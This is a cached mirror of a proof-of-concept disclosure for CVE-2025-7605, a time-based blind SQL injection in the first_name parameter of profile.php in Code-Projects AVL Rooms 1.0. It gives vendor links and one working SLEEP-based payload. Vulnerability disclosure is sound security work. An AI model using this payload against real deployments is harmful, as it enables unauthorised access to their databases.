CVE-2025-7605 PoC — Code-Projects AVL Rooms 安全漏洞

Source

https://github.com/sunhuiHi666/CVE-2025-7605

Associated Vulnerability

Title:Code-Projects AVL Rooms 安全漏洞 (CVE-2025-7605)
Description:Code-Projects AVL Rooms是Code-Projects开源的一个AVL房间系统。 Code-Projects AVL Rooms 1.0版本存在安全漏洞，该漏洞源于文件/profile.php中参数first_name的错误操作导致SQL注入。

Readme

# CVE-2025-7605
code-projects AVL Rooms Project V1.0/profile.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
AVL Rooms
# Vendor Homepage
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/
# submitter
dazhi
# Vulnerable File
/profile.php
# VERSION(S)
V1.0
# Software Link
https://code-projects.org/avl-rooms-in-php-css-javascript-and-mysql-free-download/

#  Payload:
---
    Parameter: first_name (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: first_name=1111' AND (SELECT 9037 FROM (SELECT(SLEEP(5)))RgOn) AND 'Tnsa'='Tnsa&last_name=1111&register_username=admin@qq.com&mobile_number=1111111111&city=11&state=11&action=
---

File Snapshot


 [4.0K]  /data/pocs/1b4cf104ada4bfe3643280380c4ada731fb8fbe2
└── [ 718]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!